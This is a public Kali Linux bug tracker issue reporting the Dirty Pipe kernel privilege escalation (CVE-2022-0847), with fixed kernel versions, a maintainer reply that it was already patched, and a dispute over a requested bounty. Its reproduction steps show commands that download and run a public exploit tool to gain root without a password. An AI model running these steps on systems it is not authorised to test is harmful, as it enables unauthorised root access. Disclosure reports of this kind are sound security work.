View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0007616Kali LinuxGeneral Bugpublic2022-03-11 19:452022-03-12 09:10
Reporterhimanshu725 Assigned Todaniruiz  
PriorityurgentSeveritymajorReproducibilityalways
Status resolvedResolutionfixed 
Product Version2022.1 
Fixed in Version2022.2 
Summary0007616: Kali Linux all Versions is Vulnerable to CVE 2022-0847 | Direct Privilege Escalation
Description

CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post versions 5.8 which allows overwriting data in arbitrary read-only files or in simpler words, lets unprivileged processes inject code in privileged/root process and thus, escalating privilege. The original post with intricate work and details can be found here https://dirtypipe.cm4all.com/

Steps To Reproduce
  1. Login through any Normal User that don't have super user type functionality
  2. Download an Exploit from github with the help of wget utiity
    wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
  3. Give the all permission to downloaded file
    chmod 777 traitor-amd64
  4. Finally execute it by
    ./traitor-amd64
    it gives you a this type of output
    [+] Assessing machine state...
    [+] Checking for opportunities...
    [+][kernel:CVE-2022-0847] Kernel version 5.15.0 is vulnerable!
  5. Now, at last you need to exploit this Vulnerability
    ./traitor-amd64 --exploit kernel:CVE-2022-0847
  6. BOOM!!!! you got successfully logged from ROOT User, without root password. do anything from root user.
Additional Information

##Background of Vulnerability
Max came to know of the vulnerability after he tried to resolve unprecedented CRC errors in access logs. Many consumers of cm4all.com were reporting that monthly access logs, even though downloadable, couldn’t be decompressed and were throwing errors. Max explains in his post how he has used the Z_SYNC_FLUSH mechanism along with splicing to concatenate daily log files into monthly ZIP archives available to be downloaded over HTTP. Upon closer examination, he reached the root problem.

##Mitigations
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.

##Reference
https://dirtypipe.cm4all.com/

Attached Files
POC_1.png (246,121 bytes)   
POC_1.png (246,121 bytes)   
POC_2.png (70,818 bytes)   
POC_2.png (70,818 bytes)   
POC_3.png (217,785 bytes)   
POC_3.png (217,785 bytes)   

Activities

daniruiz

daniruiz

2022-03-11 19:50

manager   ~0015868

This is already fixed in the latest kernel version
himanshu725

himanshu725

2022-03-11 20:18

reporter   ~0015869

Thanku for your response
But, I reported now. i reported first this issue of kali Linux versions.
Latest versions takes times.
that means, you need to at least monetary reward or hall of fame, as like anything that appreciates security researcher to report vulnerabilities in Future.

Thanks,
Himanshu Sharma
himanshu725

himanshu725

2022-03-11 20:19

reporter   ~0015870

Thanku for your response
But, I reported now. i reported first this issue of kali Linux versions.
Latest versions takes times.
that means, you need to at least monetary reward or hall of fame, as like anything that appreciates security researcher to report vulnerabilities in Future.

Thanks,
Himanshu Sharma
daniruiz

daniruiz

2022-03-11 20:23

manager   ~0015871

You reported a known issue that was already patched days ago and you expect a monetary reward? For using an automated script that you found online?
You have to be kidding.

Issue History

Date Modified Username Field Change
2022-03-11 19:45 himanshu725 New Issue
2022-03-11 19:45 himanshu725 File Added: POC_1.png
2022-03-11 19:45 himanshu725 File Added: POC_2.png
2022-03-11 19:45 himanshu725 File Added: POC_3.png
2022-03-11 19:50 daniruiz Note Added: 0015868
2022-03-11 19:50 daniruiz Assigned To => daniruiz
2022-03-11 19:50 daniruiz Status new => resolved
2022-03-11 19:50 daniruiz Resolution open => fixed
2022-03-11 19:50 daniruiz Fixed in Version => 2022.2
2022-03-11 20:18 himanshu725 Status resolved => feedback
2022-03-11 20:18 himanshu725 Resolution fixed => reopened
2022-03-11 20:18 himanshu725 Note Added: 0015869
2022-03-11 20:19 himanshu725 Note Added: 0015870
2022-03-11 20:19 himanshu725 Status feedback => assigned
2022-03-11 20:23 daniruiz Note Added: 0015871
2022-03-11 20:23 daniruiz Status assigned => resolved
2022-03-11 20:23 daniruiz Resolution reopened => fixed
2022-03-11 20:29 himanshu725 Status resolved => feedback
2022-03-11 20:29 himanshu725 Resolution fixed => reopened
2022-03-11 20:37 daniruiz Status feedback => resolved
2022-03-11 20:43 himanshu725 Status resolved => feedback
2022-03-12 09:10 daniruiz Status feedback => resolved
2022-03-12 09:10 daniruiz Resolution reopened => fixed